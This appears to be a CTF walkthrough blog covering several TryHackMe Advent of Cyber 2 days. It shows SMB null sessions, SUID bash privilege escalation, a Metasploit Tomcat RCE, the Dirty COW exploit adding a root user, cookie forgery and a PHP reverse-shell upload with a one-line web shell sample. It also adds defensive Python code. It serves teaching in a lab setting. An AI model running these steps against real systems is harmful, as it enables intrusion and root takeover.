Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ===================================================== 
|    Enumerating Workgroup/Domain on 10.10.180.212    |
 ===================================================== 
[+] Got domain/workgroup name: TBFC-SMB-01

 ====================================== 
|    Session Check on 10.10.180.212    |
 ====================================== 
[+] Server 10.10.180.212 allows sessions using username '', password ''

 ============================================ 
|    Getting domain SID for 10.10.180.212    |
 ============================================ 
Domain Name: TBFC-SMB-01
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ========================================== 
|    Share Enumeration on 10.10.180.212    |
 ========================================== 
WARNING: The "syslog" option is deprecated

    Sharename       Type      Comment
    ---------       ----      -------
    tbfc-hr         Disk      tbfc-hr
    tbfc-it         Disk      tbfc-it
    tbfc-santa      Disk      tbfc-santa
    IPC$            IPC       IPC Service (tbfc-smb server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

    Server               Comment
    ---------            -------

    Workgroup            Master
    ---------            -------
    TBFC-SMB-01          TBFC-SMB

[+] Attempting to map shares on 10.10.180.212
//10.10.180.212/tbfc-hr    Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-it    Mapping: DENIED, Listing: N/A
//10.10.180.212/tbfc-santa    Mapping: OK, Listing: OK
//10.10.180.212/IPC$    [E] Can't understand response:
WARNING: The "syslog" option is deprecated
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
enum4linux complete on Sun Dec 13 09:45:11 2020

The output shows that tbfc-santa could be mapped with a null session (empty username and password), while tbfc-hr and tbfc-it were denied. Let's connect to that share without a password, for example with smbclient //10.10.180.212/tbfc-santa -N. With dir we list the content and should have all information to finish the tasks.

Day 11 – The Rogue Gnome

We start up the attack box and challenge. While they boot we read the documentation in the challenge and answer the first two questions.

Then we SSH into the box with the provided credentials: ssh cmnatic@10.10.154.38. On the first connect, you will have to confirm the server's fingerprint.

With find / -perm -u=s -type f 2>/dev/null we search for regular files that have the SUID bit set, meaning they run with the privileges of the file's owner (here root) rather than those of the user who starts them. The 2>/dev/null discards the permission denied errors for directories we are not allowed to read. Most of the hits below are the usual suspects (passwd, sudo, mount, ...), so we look for anything unusual.

-bash-4.4$ find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/mount
/bin/su
/bin/fusermount
/bin/bash
/bin/ping
/snap/core/10444/bin/mount
/snap/core/10444/bin/ping
/snap/core/10444/bin/ping6
/snap/core/10444/bin/su
/snap/core/10444/bin/umount
/snap/core/10444/usr/bin/chfn
/snap/core/10444/usr/bin/chsh
/snap/core/10444/usr/bin/gpasswd
/snap/core/10444/usr/bin/newgrp
/snap/core/10444/usr/bin/passwd
/snap/core/10444/usr/bin/sudo
/snap/core/10444/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/10444/usr/lib/openssh/ssh-keysign
/snap/core/10444/usr/lib/snapd/snap-confine
/snap/core/10444/usr/sbin/pppd
/snap/core/7270/bin/mount
/snap/core/7270/bin/ping
/snap/core/7270/bin/ping6
/snap/core/7270/bin/su
/snap/core/7270/bin/umount
/snap/core/7270/usr/bin/chfn
/snap/core/7270/usr/bin/chsh
/snap/core/7270/usr/bin/gpasswd
/snap/core/7270/usr/bin/newgrp
/snap/core/7270/usr/bin/passwd
/snap/core/7270/usr/bin/sudo
/snap/core/7270/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/7270/usr/lib/openssh/ssh-keysign
/snap/core/7270/usr/lib/snapd/snap-confine
/snap/core/7270/usr/sbin/pppd
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/chsh
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine

/bin/bash looks like a very promising candidate, because a shell with the SUID bit set hands out its owner's privileges directly. Let's check the permissions.

-bash-4.4$ ls -la /bin/bash 
-rwsr-xr-x 1 root root 1113504 Jun  6  2019 /bin/bash
-bash-4.4$ 

Looks like it can be run as root: the s in the owner's execute position (-rws) marks the SUID bit and the owner is root. We will do just that with bash -p. The -p flag matters: in privileged mode bash keeps the effective UID it was started with, whereas without it bash notices that the effective UID differs from the real UID and resets it, silently dropping the privileges we are after. Confirm with id afterwards, which should report euid=0(root).

Now we can cat the flag file.

Day 12: Ready, set, elf.

After deploying the boxes we run a quick nmap scan to get an overview:

root@ip-10-10-214-41:~# nmap -sV -v 10.10.83.199

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-13 10:24 GMT
NSE: Loaded 42 scripts for scanning.
Initiating ARP Ping Scan at 10:24
Scanning 10.10.83.199 [1 port]
Completed ARP Ping Scan at 10:24, 0.22s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:24
Completed Parallel DNS resolution of 1 host. at 10:24, 0.00s elapsed
Initiating SYN Stealth Scan at 10:24
Scanning ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199) [1000 ports]
Discovered open port 8080/tcp on 10.10.83.199
Discovered open port 3389/tcp on 10.10.83.199
Discovered open port 8009/tcp on 10.10.83.199
Increasing send delay for 10.10.83.199 from 0 to 5 due to 11 out of 27 dropped probes since last increase.
Completed SYN Stealth Scan at 10:24, 20.25s elapsed (1000 total ports)
Initiating Service scan at 10:24
Scanning 3 services on ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Completed Service scan at 10:25, 13.88s elapsed (3 services on 1 host)
NSE: Script scanning 10.10.83.199.
Initiating NSE at 10:25
Completed NSE at 10:25, 0.30s elapsed
Initiating NSE at 10:25
Completed NSE at 10:25, 0.00s elapsed
Nmap scan report for ip-10-10-83-199.eu-west-1.compute.internal (10.10.83.199)
Host is up (0.011s latency).
Not shown: 997 filtered ports
PORT     STATE SERVICE       VERSION
3389/tcp open  ms-wbt-server Microsoft Terminal Services
8009/tcp open  ajp13         Apache Jserv (Protocol v1.3)
8080/tcp open  http-proxy
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.60%I=7%D=12/13%Time=5FD5EBF5%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,2000,"HTTP/1\.1\x20200\x20\r\nContent-Type:\x20text/html;char
SF:set=UTF-8\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:53\x20GMT\r\nC
SF:onnection:\x20close\r\n\r\n\r\n\r\n\r\n<!DOCTYPE\x20html>\r\n<html\x20l
SF:ang=\"en\">\r\n\x20\x20\x20\x20<head>\r\n\x20\x20\x20\x20\x20\x20\x20\x
SF:20<meta\x20charset=\"UTF-8\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<
SF:title>Apache\x20Tomcat/9\.0\.17</title>\r\n\x20\x20\x20\x20\x20\x20\x20
SF:\x20<link\x20href=\"favicon\.ico\"\x20rel=\"icon\"\x20type=\"image/x-ic
SF:on\"\x20/>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"favicon\.
SF:ico\"\x20rel=\"shortcut\x20icon\"\x20type=\"image/x-icon\"\x20/>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20<link\x20href=\"tomcat\.css\"\x20rel=\"sty
SF:lesheet\"\x20type=\"text/css\"\x20/>\r\n\x20\x20\x20\x20</head>\r\n\r\n
SF:\x20\x20\x20\x20<body>\r\n\x20\x20\x20\x20\x20\x20\x20\x20<div\x20id=\"
SF:wrapper\">\r\n\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<div\x20i
SF:d=\"navigation\"\x20class=\"curved\x20container\">\r\n\x20\x20\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"nav-home\"
SF:><a\x20href=\"https://tomcat\.apache\.org/\">Home</a></span>\r\n\x20\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"
SF:nav-hosts\"><a\x20href=\"/docs/\">Documentation</a></span>\r\n\x20\x20\
SF:x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20id=\"na
SF:v-config\"><a\x20href=\"/docs/config/\">Configuration</a></span>\r\n\x2
SF:0\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20<span\x20i
SF:d=\"nav-examples\"><a\x20href=\"/examples/\">Examples")%r(HTTPOptions,7
SF:D,"HTTP/1\.1\x20200\x20\r\nAllow:\x20GET,\x20HEAD,\x20POST,\x20OPTIONS\
SF:r\nContent-Length:\x200\r\nDate:\x20Sun,\x2013\x20Dec\x202020\x2010:24:
SF:54\x20GMT\r\nConnection:\x20close\r\n\r\n")%r(RTSPRequest,8CB,"HTTP/1\.
SF:1\x20505\x20\r\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Lan
SF:guage:\x20en\r\nContent-Length:\x202114\r\nDate:\x20Sun,\x2013\x20Dec\x
SF:202020\x2010:24:54\x20GMT\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"
SF:><head><title>HTTP\x20Status\x20505\x20\xe2\x80\x93\x20HTTP\x20Version\
SF:x20Not\x20Supported</title><style\x20type=\"text/css\">h1\x20{font-fami
SF:ly:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-si
SF:ze:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;font-size:16px;}\x20h3\x20{font-family:Tahoma,Ari
SF:al,sans-serif;color:white;background-color:#525D76;font-size:14px;}\x20
SF:body\x20{font-family:Tahoma,Arial,sans-serif;color:black;background-col
SF:or:white;}\x20b\x20{font-family:Tahoma,Arial,sans-serif;color:white;bac
SF:kground-color:#525D76;}\x20p\x20{font-family:Tahoma,Arial,sans-serif;ba
SF:ckground:white;color:black;font-size:12px;}\x20a\x20{color:black;}\x20a
SF:\.name\x20{color:black;}\x20\.line\x20{height:1px;background-color:#525
SF:D76;border:none;}</style></head><body><h");
MAC Address: 02:34:E1:B1:70:6F (Unknown)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.07 seconds
           Raw packets sent: 3011 (132.468KB) | Rcvd: 20 (872B)

Looks like there is a web server running on port 8080; the service fingerprint above already contains the page title Apache Tomcat/9.0.17, and the AJP connector on 8009 confirms Tomcat. Let's look at it by pulling it up in the browser.

Here we can see what version of Tomcat is running. Now we start Metasploit with msfconsole.

search tomcat lists a number of exploits Metasploit provides for Tomcat. info <path> shows the details of an exploit.

The one that seems promising is exploit/windows/http/tomcat_cgi_cmdlineargs:

msf5 > info exploit/windows/http/tomcat_cgi_cmdlineargs

       Name: Apache Tomcat CGIServlet enableCmdLineArguments Vulnerability
     Module: exploit/windows/http/tomcat_cgi_cmdlineargs
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-04-10

Provided by:
  Yakov Shafranovich
  sinn3r <sinn3r@metasploit.com>

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Apache Tomcat 9.0 or prior for Windows

Check supported:
  Yes

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      8080             yes       The target port (TCP)
  SSL        false            no        Negotiate SSL/TLS for outgoing connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI  /                yes       The URI path to CGI script
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in Apache Tomcat's CGIServlet 
  component. When the enableCmdLineArguments setting is set to true, a 
  remote user can abuse this to execute system commands, and gain 
  remote code execution.

References:
  https://cvedetails.com/cve/CVE-2019-0232/
  Remote Code Execution (RCE) in CGI Servlet – Apache Tomcat on Windows – CVE-2019-0232
  https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/

We select it with use exploit/windows/http/tomcat_cgi_cmdlineargs

options shows us the available settings for this exploit. First we double check that LHOST is our attack box IP.

Then we set the target to the server's IP: set RHOSTS 10.10.83.199 (the module lists the option as RHOSTS; set RHOST works as well, since msf5 aliases the two).

Now we need a script in the CGI folder, because the vulnerability sits in Tomcat's CGI servlet and only triggers when it runs a script with enableCmdLineArguments on. Following the challenge description we can find http://10.10.83.199:8080/cgi-bin/elfwhacker.bat. We use set TARGETURI /cgi-bin/elfwhacker.bat and double check our options.

When everything is fine, we issue exploit to start the attack.

We are now in a meterpreter session on the server. With dir we can list the directory content.

meterpreter > dir
Listing: C:\Program Files\Apache Software Foundation\Tomcat 9.0\webapps\ROOT\WEB-INF\cgi-bin
============================================================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  73802  fil   2020-12-13 10:56:07 +0000  cyGMM.exe
100777/rwxrwxrwx  825    fil   2020-11-19 03:49:25 +0000  elfwhacker.bat
100666/rw-rw-rw-  27     fil   2020-11-19 22:05:43 +0000  flag1.txt

We can cat the flag file and finish the challenge. There is more to explore here and you should use the opportunity to play around with Metasploit and privilege escalation.
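The module description only says that enableCmdLineArguments lets a remote user run commands. What actually happens, and what the fix in Tomcat 9.0.18 checks, is modelled in the following Python, added for this writeup and not code from the page, the challenge or Tomcat itself. The CGI servlet turns a query string without an = into +-separated command-line arguments (RFC 3875 search strings); on Windows those arguments are handed to cmd.exe as one string, so an argument such as &whoami becomes a second command. Tomcat's fix added the cmdLineArgumentsDecoded allow-list pattern reproduced here and turned enableCmdLineArguments off by default. The elfwhacker.bat name comes from the page; the query strings are constructed.

```python
import re
from urllib.parse import unquote

# Default of the cmdLineArgumentsDecoded init-param that Tomcat 9.0.18 added
# when fixing CVE-2019-0232 (Java form: [[a-zA-Z0-9\Q-._/\E]+). Every decoded
# argument must match it completely or the request is answered with 400.
CMD_LINE_ARGUMENTS_DECODED = re.compile(r"[a-zA-Z0-9\-._/]+")


def split_cgi_args(query_string: str) -> list:
    """CGI (RFC 3875, section 4.4): a query string without '=' is a search
    string; its '+'-separated words, URL-decoded, become the script's
    command-line arguments. With '=' present nothing is passed."""
    if not query_string or "=" in query_string:
        return []
    return [unquote(part) for part in query_string.split("+")]


def windows_command_line(script: str, args: list) -> str:
    """Simplified model of why this is RCE on Windows only: the interpreter
    and the arguments are joined into ONE command-line string that cmd.exe
    re-parses, so an argument containing '&' starts a second command."""
    return " ".join([script] + args)


def vulnerable_cgi_args(query_string: str) -> list:
    """Tomcat <= 9.0.17 with enableCmdLineArguments=true: no validation."""
    return split_cgi_args(query_string)


def hardened_cgi_args(query_string: str) -> list:
    """Tomcat >= 9.0.18 behaviour: every argument must match the pattern."""
    args = split_cgi_args(query_string)
    for arg in args:
        if not CMD_LINE_ARGUMENTS_DECODED.fullmatch(arg):
            raise ValueError(f"rejected CGI argument: {arg!r}")
    return args


def is_rejected(query_string: str) -> bool:
    """True if the hardened servlet would answer 400 for this query string."""
    try:
        hardened_cgi_args(query_string)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    # Constructed requests against the script the module targets on the page.
    for qs in ["foo+bar", "&whoami"]:
        args = vulnerable_cgi_args(qs)
        print(f"?{qs:8} -> args {args!r:14} cmd: {windows_command_line('elfwhacker.bat', args)}")
        print(f"{'':10}   hardened rejects: {is_rejected(qs)}")
```

The same check explains why the box was exploitable: 9.0.17 is the last 9.0.x release without the pattern, the CGI servlet had been enabled (it is off by default) and a script existed for it to run.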

Day 13: Coal For Christmas

As always, hit the deploy buttons. Once everything is booted up, we run a quick nmap scan.

root@ip-10-10-224-179:~# nmap 10.10.34.134

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-14 10:58 GMT
Nmap scan report for ip-10-10-34-134.eu-west-1.compute.internal (10.10.34.134)
Host is up (0.00082s latency).
Not shown: 997 closed ports
PORT    STATE SERVICE
22/tcp  open  ssh
23/tcp  open  telnet
111/tcp open  rpcbind
MAC Address: 02:91:2C:86:CD:15 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 3.04 seconds

Telnet is an unencrypted predecessor of SSH: everything, including the login, crosses the network in cleartext. So let's connect with telnet 10.10.34.134 23. Luckily for us, we are provided with credentials in the greeting text.

First thing we do is get an idea of what system we are dealing with.

$ uname -a
Linux christmas 3.2.0-23-generic #36-Ubuntu SMP Tue Apr 10 20:39:51 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
$ cat /etc/*release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04 LTS"

With ls we have a look at what files we have in our home folder.

$ ls
christmas.sh  cookies_and_milk.txt

Looking at cookies_and_milk.txt we will be able to answer the question of who got there first.

The challenge asks us to learn about Dirty COW (CVE-2016-5195), a race condition in the Linux kernel's copy-on-write handling that lets an unprivileged user write to files it may only read, /etc/passwd included. The kernel here, 3.2.0-23 from 2012, predates the October 2016 fix by years, so the box is a textbook target. Let's do that.

On the site you can find a link to the code of the Dirty COW exploit. To get the code onto the box, I create a new file with nano dirty.c and paste the source. CTRL+O saves the file, CTRL+X closes the editor.

In the comment header of the source code we just copied, it is explained how to compile the exploit. So let's do that with gcc -pthread dirty.c -o dirty -lcrypt.

Now we run the exploit. In my case, I went for the absolutely insecure password of foo when prompted.

$ ./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 
Complete line:
firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash

mmap: 7f9ccb251000
madvise 0

ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'foo'.


DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

With su firefart we switch to the new user; because the entry carries UID 0, this is a root shell. cd ~ brings us to the home of firefart, which is /root according to the passwd line above. In there we find message_from_the_grinch.txt.

firefart@christmas:~# cat message_from_the_grinch.txt
Nice work, Santa!

Wow, this house sure was DIRTY!
I think they deserve coal for Christmas, don't you?
So let's leave some coal under the Christmas `tree`!

Let's work together on this. Leave this text file here,
and leave the christmas.sh script here too...
but, create a file named `coal` in this directory!
Then, inside this directory, pipe the output
of the `tree` command into the `md5sum` command.

The output of that command (the hash itself) is
the flag you can submit to complete this task
for the Advent of Cyber!

    - Yours,
        John Hammond
        er, sorry, I mean, the Grinch

      - THE GRINCH, SERIOUSLY

Following the instructions we use touch coal to create the coal file, then run tree | md5sum to get the final answer. Before leaving the box, heed the exploit's own warning and restore /etc/passwd from /tmp/passwd.bak.
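Once you are root this way, it pays to know what the exploit did to the system, both to clean up and to recognise the same trick on a box you defend. The following Python is an added example for this writeup, not part of the page or of dirty.c: it parses /etc/passwd content and flags the traces this exploit leaves (an extra UID-0 account, a hash in the password field instead of the shadow placeholder x, a missing root line and the broken fragment of the entry that got partially overwritten), comparing against the backup the exploit wrote to /tmp/passwd.bak. The firefart line is the one printed above; the other entries and the fragment are constructed.

```python
from typing import List, NamedTuple, Optional, Tuple


class PasswdEntry(NamedTuple):
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


# Constructed sample: /etc/passwd after the exploit ran. dirty.c writes its
# new line over the START of the file, so the root line is gone and the tail
# of the next entry survives as a broken fragment. The firefart line is the
# one the exploit printed on the page; the other entries are made up.
PASSWD_AFTER = """\
firefart:fiIoY9ux7Hzpc:0:0:pwned:/root:/bin/bash
emon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
santa:x:1000:1000:Santa Claus,,,:/home/santa:/bin/bash
"""

# Constructed sample: the backup the exploit left in /tmp/passwd.bak.
PASSWD_BACKUP = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
santa:x:1000:1000:Santa Claus,,,:/home/santa:/bin/bash
"""

# Values the second field normally holds when the real hash lives in /etc/shadow.
SHADOW_PLACEHOLDERS = {"x", "*", "!", ""}


def parse_passwd(text: str) -> Tuple[List[PasswdEntry], List[str]]:
    """Split passwd(5) lines into entries; anything that is not 7 fields with
    a numeric uid and gid is returned separately as malformed."""
    entries, malformed = [], []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        f = line.split(":")
        if len(f) != 7 or not f[2].isdigit() or not f[3].isdigit():
            malformed.append(line)
            continue
        entries.append(PasswdEntry(f[0], f[1], int(f[2]), int(f[3]), f[4], f[5], f[6]))
    return entries, malformed


def audit_passwd(current: str, baseline: Optional[str] = None) -> List[str]:
    """Return findings typical for a Dirty COW style overwrite of /etc/passwd."""
    findings = []
    entries, malformed = parse_passwd(current)
    for line in malformed:
        findings.append(f"malformed line, partial overwrite?: {line!r}")
    names = {e.name for e in entries}
    if "root" not in names:
        findings.append("root entry missing")
    for e in entries:
        if e.uid == 0 and e.name != "root":
            findings.append(f"extra uid-0 account: {e.name} (shell {e.shell})")
        if e.passwd not in SHADOW_PLACEHOLDERS:
            findings.append(f"password hash stored in passwd, not shadow: {e.name}")
    if baseline is not None:
        base_names = {e.name for e in parse_passwd(baseline)[0]}
        findings += [f"account not in backup: {n}" for n in sorted(names - base_names)]
        findings += [f"account missing vs backup: {n}" for n in sorted(base_names - names)]
    return findings


if __name__ == "__main__":
    for finding in audit_passwd(PASSWD_AFTER, PASSWD_BACKUP):
        print("-", finding)
```

On a live system you would feed it the contents of /etc/passwd and, if present, /tmp/passwd.bak; a clean file audited against itself yields no findings.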

TryHackMe – Advent of Cyber 2 Day 1-6 – Web Exploitation [Writeup]

Advent of Cyber 2 is a free, holiday-season themed room on TryHackMe; all you need to get started is an account.

A new challenge is released every day and I will update this blog post after I have completed the next day.

Day 1 – A Christmas Crisis

Deploy the attack machine and the challenge by clicking the green buttons. Then open the browser of the attack box and enter the IP of the deployed challenge box.

Now create a user by entering a username and password and clicking Register, then log in.

Open the developer tools of the browser with Ctrl+Shift+I and navigate to the storage panel, where cookies are listed. Here you can see the cookie name (auth) and its value.

Looking at the value, you can either know from experience what kind of encoding is used, or, if you have no idea, pull up CyberChef, paste in the value and try a few of the favourites.

Hint: the answer is the full name of the encoding, not just the three letter short handle.

For my username of foobar the cookie decodes to:

{"company":"The Best Festival Company", "username":"foobar"}

This is JSON. (Sorry, there is no way to be less obvious about it.)

To get Santa's cookie, we now need to change the username in the JSON to santa and encode that JSON as hex again. You can do that in CyberChef as well; make sure to select a delimiter of None. Nothing in the cookie is signed or tied to our session, so the server has no way of telling our edited value from one it issued itself.

Now we go back to the assembly line website and our developer tools. We replace the value of the auth cookie with what we just calculated, then reload the page.

Now we can turn on the assembly line again and when all switches are flipped on, the final flag is revealed.
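The whole attack works because the server trusts a value the client controls. The Python below is an added example for this writeup, not code from the page or the challenge: it performs the decode, edit and re-encode steps from above, shows a server that reads the username straight out of the cookie accepting the forged value, and contrasts it with a server that HMAC-signs the cookie and rejects anything it did not issue. The server secret and the two server-side helpers are constructed for the example; the JSON document is the one shown above.

```python
import binascii
import hashlib
import hmac
import json

# The decoded cookie for the user "foobar" as shown on the page.
ORIGINAL_JSON = '{"company":"The Best Festival Company", "username":"foobar"}'

# Constructed server-side key for the hardened variant; not a value from the page.
SERVER_SECRET = b"example-server-secret-rotate-me"


def hex_encode(text: str) -> str:
    """Hex with no delimiter, the encoding the auth cookie uses."""
    return binascii.hexlify(text.encode("utf-8")).decode("ascii")


def decode_auth_cookie(hex_value: str) -> dict:
    """Hex -> bytes -> JSON, the same two steps CyberChef performs."""
    return json.loads(binascii.unhexlify(hex_value).decode("utf-8"))


def forge_auth_cookie(hex_value: str, new_username: str) -> str:
    """Rewrite the username field and hex-encode the document again."""
    data = decode_auth_cookie(hex_value)
    data["username"] = new_username
    return hex_encode(json.dumps(data))


def vulnerable_current_user(cookie_hex: str) -> str:
    """The assembly line's mistake: whatever the cookie claims is believed."""
    return decode_auth_cookie(cookie_hex)["username"]


def issue_signed_cookie(payload: dict, secret: bytes = SERVER_SECRET) -> str:
    """Hardened variant: append an HMAC over the hex body. The client can
    still read the JSON, but cannot produce a valid tag without the key."""
    body = hex_encode(json.dumps(payload))
    tag = hmac.new(secret, body.encode("ascii"), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def hardened_current_user(signed_cookie: str, secret: bytes = SERVER_SECRET):
    """Return the username only if the tag verifies, otherwise None."""
    body, sep, tag = signed_cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(secret, body.encode("ascii"), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return decode_auth_cookie(body)["username"]


if __name__ == "__main__":
    cookie = hex_encode(ORIGINAL_JSON)
    print("decoded:", decode_auth_cookie(cookie))
    forged = forge_auth_cookie(cookie, "santa")
    print("vulnerable server sees:", vulnerable_current_user(forged))
    signed = issue_signed_cookie(decode_auth_cookie(cookie))
    body, _, tag = signed.rpartition(".")
    tampered = forge_auth_cookie(body, "santa") + "." + tag
    print("hardened server sees:", hardened_current_user(tampered))
```

Signing alone fixes the tampering; it does not hide the contents, so anything secret would additionally need encryption or, better, a server-side session keyed by a random identifier.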

Day 2 – The Elf Strikes Back!

As always we start with deploying both the attack box and the challenge server.

First we bring up the IP of the challenge in our browser. The website pretty much tells us what to do next. We add ?id=YOUR_ID_HERE to the url and replace YOUR_ID_HERE with the code provided the challenge description.

This leads us to the upload page.

Checking the file types in the upload dialog or the source code reveals that the website accepts .jpeg, .jpg and .png files, all common image formats.

The Walk-through / challenge asks us now to upload a reverse shell. The briefing even tells us what reverse shell.

But let us quickly talk about how we can find out what kind of reverse shell we should try. First we need to know what language the server runs. If we are lucky, like in this case, we get that information from an HTTP response header.

To view the headers, we open up the developer tools again and head to the Network tab. After a reload of the page, it should populate. We click on the main document, the one with our id, then select Headers on the right panel. Scrolling through the headers we find X-Powered-By: PHP/7.2.24.

This tells us we are looking for a PHP reverse shell, just as suggested in the challenge.

As suggested in the guide, we copy the reverse shell with cp /usr/share/webshells/php/php-reverse-shell.php . in the terminal to our working directory. Then we run subl php-reverse-shell.php to open the reverse shell code in Sublime Text.

Now we change line 49 and replace the placeholder with the IP of our attack box, which is shown at the top of the TryHackMe page. We also change the port in line 50 to the suggested 4444. Any free, high-numbered port works here; we just have to use the same port when setting up the listener in the next step.

After saving the file we switch back to the terminal and set up a netcat listener with sudo nc -lvnp 4444

Netcat is a tool that lets us listen for and send network traffic. Strictly, sudo is only needed to bind ports below 1024, so 4444 would work without it; on the AttackBox we are root anyway, so it makes no difference.

Now we need to upload our reverse shell. But the website does not accept .php files. We still need the name to end in .php for the server to interpret the file as code and run it.

That's why we rename it to include one of the supported file types while keeping .php last, for example let it end in .png.php.

It uploads the file but we still have nothing on the terminal. We first have to get the server to execute our reverse shell. Sometimes you get lucky and the uploaded file is displayed right back to you, but not here.

So we need to find our reverse shell. It will be in some kind of upload directory on the server. We could use something like ffuf with a word list to find potential upload URLs. But in this case we can try and guess a few common ones, like upload.

We click our reverse shell there. The website will probably hang loading, but we get our shell back in the terminal.

With cat /var/www/flag.txt we can display the final flag.
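Why did a name ending in .png.php get through a filter that only wants images? The page does not show the server-side code, so the weak check below is an assumption: a filter that reads the first extension in the name. The Python is an added example for this writeup, not code from the page or the challenge; it puts that weak check beside a hardened one that looks only at the final extension, verifies the file's magic bytes and throws away the client-supplied name. The sample uploads are constructed.

```python
import os
import secrets

ALLOWED_EXTENSIONS = {".jpg", ".jpeg", ".png"}

# File signatures for the image types the form accepts (constructed lookup).
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}


def vulnerable_accepts(filename: str) -> bool:
    """Assumed weak check: looks at the FIRST extension only.
    'shell.png.php'.split('.') -> ['shell', 'png', 'php'], so it passes."""
    parts = filename.lower().split(".")
    return len(parts) > 1 and "." + parts[1] in ALLOWED_EXTENSIONS


def hardened_accepts(filename: str, content: bytes) -> bool:
    """Only the LAST extension counts, and the bytes must match it."""
    ext = os.path.splitext(filename.lower())[1]
    if ext not in ALLOWED_EXTENSIONS:
        return False
    return content.startswith(IMAGE_MAGIC[ext])


def stored_name(filename: str) -> str:
    """Never reuse the client-supplied name: keep only the vetted extension
    and generate the base name server-side."""
    ext = os.path.splitext(filename.lower())[1]
    return secrets.token_hex(16) + ext


# Constructed sample uploads.
PHP_SHELL = b"<?php system($_GET['cmd']); ?>"   # stands in for php-reverse-shell.php
PNG_IMAGE = IMAGE_MAGIC[".png"] + b"\x00" * 16

if __name__ == "__main__":
    uploads = [("santa.png", PNG_IMAGE), ("shell.php", PHP_SHELL), ("shell.png.php", PHP_SHELL)]
    for name, body in uploads:
        print(f"{name:14} weak={vulnerable_accepts(name)!s:5} hardened={hardened_accepts(name, body)}")
```

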